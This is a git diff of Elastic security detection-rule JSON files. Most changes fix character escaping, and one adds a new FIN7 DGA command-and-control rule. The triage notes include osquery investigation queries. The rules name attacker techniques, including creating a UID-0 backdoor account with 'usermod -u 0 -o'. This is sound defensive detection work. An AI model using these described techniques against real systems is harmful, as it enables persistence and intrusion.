Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. 
\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.name == \"usermod\" and\nprocess.args : \"-u\" and process.args : \"0\" and process.args : \"-o\"\n",
 "related_integrations": [
 {
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_104.json
index ed3c73ea2c6..6aeecee6a1f 100644
--- a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_104.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_105.json
index 41be27ae950..8092075797d 100644
--- a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_105.json
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Application Removed from Blocklist in Google Workspace", - "note": "## Triage and analysis\n\n### Investigating Application Removed from Blocklist in Google Workspace\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Individual users with the appropriate permissions can install applications in their Google Workspace domain. Administrators have additional permissions that allow them to install applications for an entire Google Workspace domain. Consent screens typically display permissions and privileges the user needs to install an application. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any Marketplace product that originates from a source that isn't Google.\n\nThis rule identifies a Marketplace blocklist update that consists of a Google Workspace account with administrative privileges manually removing a previously blocked application.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security \u003e Investigation` tool with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- After identifying the involved user account, review other potentially related events within the last 48 
hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Application Removed from Blocklist in Google Workspace\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. 
Individual users with the appropriate permissions can install applications in their Google Workspace domain. Administrators have additional permissions that allow them to install applications for an entire Google Workspace domain. Consent screens typically display permissions and privileges the user needs to install an application. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any Marketplace product that originates from a source that isn't Google.\n\nThis rule identifies a Marketplace blocklist update that consists of a Google Workspace account with administrative privileges manually removing a previously blocked application.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security > Investigation` tool with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- After identifying the involved user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and 
assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.category:\"iam\" and event.type:\"change\" and\n event.action:\"CHANGE_APPLICATION_SETTING\" and\n google_workspace.admin.application.name:\"Google Workspace Marketplace\" and\n google_workspace.admin.old_value: *allowed*false* and google_workspace.admin.new_value: *allowed*true*\n", "references": [ "https://support.google.com/a/answer/6328701?hl=en#" 
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_106.json
index 259d53c346d..6bf966293db 100644
--- a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_106.json
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Application Removed from Blocklist in Google Workspace", - "note": "## Triage and analysis\n\n### Investigating Application Removed from Blocklist in Google Workspace\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Individual users with the appropriate permissions can install applications in their Google Workspace domain. Administrators have additional permissions that allow them to install applications for an entire Google Workspace domain. Consent screens typically display permissions and privileges the user needs to install an application. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any Marketplace product that originates from a source that isn't Google.\n\nThis rule identifies a Marketplace blocklist update that consists of a Google Workspace account with administrative privileges manually removing a previously blocked application.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security \u003e Investigation` tool with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- After identifying the involved user account, review other potentially related events within the last 48 
hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Application Removed from Blocklist in Google Workspace\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. 
Individual users with the appropriate permissions can install applications in their Google Workspace domain. Administrators have additional permissions that allow them to install applications for an entire Google Workspace domain. Consent screens typically display permissions and privileges the user needs to install an application. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any Marketplace product that originates from a source that isn't Google.\n\nThis rule identifies a Marketplace blocklist update that consists of a Google Workspace account with administrative privileges manually removing a previously blocked application.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security > Investigation` tool with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- After identifying the involved user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and 
assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.category:\"iam\" and event.type:\"change\" and\n event.action:\"CHANGE_APPLICATION_SETTING\" and\n google_workspace.admin.application.name:\"Google Workspace Marketplace\" and\n google_workspace.admin.old_value: *allowed*false* and google_workspace.admin.new_value: *allowed*true*\n", "references": [ "https://support.google.com/a/answer/6328701?hl=en#" 
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_1.json b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_1.json
index 7ddec505f54..c598a68d5ee 100644
--- a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_1.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_2.json b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_2.json
index 9c4c864e4ec..30cca2334ad 100644
--- a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_2.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_3.json b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_3.json
index 09339d2a4cf..62027f5ce06 100644
--- a/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/4982ac3e-d0ee-4818-b95d-d9522d689259_3.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_101.json b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_101.json
index a06a40b4879..077cc159bf0 100644
--- a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_101.json
@@ -35,7 +35,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_102.json b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_102.json
index ac8daf2c3d2..f2046b8b55e 100644
--- a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_102.json
@@ -31,7 +31,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_103.json b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_103.json
index 10db24f5702..be94d9ef4ad 100644
--- a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_103.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_104.json b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_104.json
index 4220b9f6f76..877b273d6f4 100644
--- a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_104.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_105.json b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_105.json
new file mode 100644
index 00000000000..b7e9b54a415
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/4a4e23cf-78a2-449c-bac3-701924c269d3_105.json
@@ -0,0 +1,69 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network.",
+ "false_positives": [
+ "This rule could identify benign domains that are formatted similarly to FIN7's command and control algorithm. Alerts should be investigated by an analyst to assess the validity of the individual observations."
+ ],
+ "from": "now-9m",
+ "index": [
+ "packetbeat-*",
+ "auditbeat-*",
+ "filebeat-*",
+ "logs-network_traffic.*"
+ ],
+ "language": "lucene",
+ "license": "Elastic License v2",
+ "name": "Possible FIN7 DGA Command and Control Behavior",
+ "note": "## Triage and analysis\n\nIn the event this rule identifies benign domains in your environment, the `destination.domain` field in the rule can be modified to include those domains. Example: `...AND NOT destination.domain:(zoom.us OR benign.domain1 OR benign.domain2)`.",
+ "query": "(event.dataset: (network_traffic.tls OR network_traffic.http) OR\n (event.category: (network OR network_traffic) AND type: (tls OR http) AND network.transport: tcp)) AND\ndestination.domain:/[a-zA-Z]{4,5}\\.(pw|us|club|info|site|top)/ AND NOT destination.domain:zoom.us\n",
+ "references": [
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+ ],
+ "related_integrations": [],
+ "risk_score": 73,
+ "rule_id": "4a4e23cf-78a2-449c-bac3-701924c269d3",
+ "severity": "high",
+ "tags": [
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Domain: Endpoint"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1071",
+ "name": "Application Layer Protocol",
+ "reference": 
"https://attack.mitre.org/techniques/T1071/"
+ },
+ {
+ "id": "T1568",
+ "name": "Dynamic Resolution",
+ "reference": "https://attack.mitre.org/techniques/T1568/",
+ "subtechnique": [
+ {
+ "id": "T1568.002",
+ "name": "Domain Generation Algorithms",
+ "reference": "https://attack.mitre.org/techniques/T1568/002/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 105
+ },
+ "id": "4a4e23cf-78a2-449c-bac3-701924c269d3_105",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_1.json b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_1.json
index 4f4ed2a6f20..3a53779d99d 100644
--- a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_1.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_2.json b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_2.json
index b9356ced2e4..c9887d18ce2 100644
--- a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_2.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
